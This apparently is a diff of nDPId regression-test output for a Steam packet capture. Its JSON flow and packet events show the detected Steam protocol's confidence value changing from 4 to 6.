-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1357332165037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165037,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARORzAqLyVy025BbJhaYkALFmPVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165038,"flow_last_seen":1357332165038,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165038,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1357332165038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165038,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx3AqLyVkkKYD7JhaYoALLOPVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165038,"flow_last_seen":1357332165038,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165038,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165038,"flow_last_seen":1357332165038,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165038,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1357332165075,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165075,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTYAAIAR3dxIpT2vwKi8lWmJsmEANO1rVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAw5zrdLEAAAA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1357332165087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165087,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx3AqLyVkkKYD7JhaYsALLOOVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1357332165087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165087,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxzAqLyVSKU9rrJhaYoALFeOVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1357332165088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165088,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6vAqLyV0G+FVLJhaYkALIgeVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1357332165088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165088,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkyDAqLyVkkKYDLJhaYkALLOTVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1357332165121,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165121,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTcAAIAROeCSQpgNwKi8lWmJsmEANEZHVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAkDOUBj8BAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1357332165125,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165125,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTgAAIAR3dtIpT2uwKi8lWmKsmEANFKmVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAqXeqX6cAAAA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1357332165137,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165137,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LzAqLyVUatzB7JhaYkALBkwVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1357332165137,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165137,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw\/AqLyVSKU9u7JhaYkALFeCVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1357332165138,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165138,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L7AqLyVUatzBbJhaYkALBkyVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1357332165138,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165138,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6vAqLyV0G+FVLJhaYoALIgdVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1357332165148,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165148,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTkAAIARDmnQb4VVwKi8lWmKsmEANIntVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAATel0NDIBAAA="} 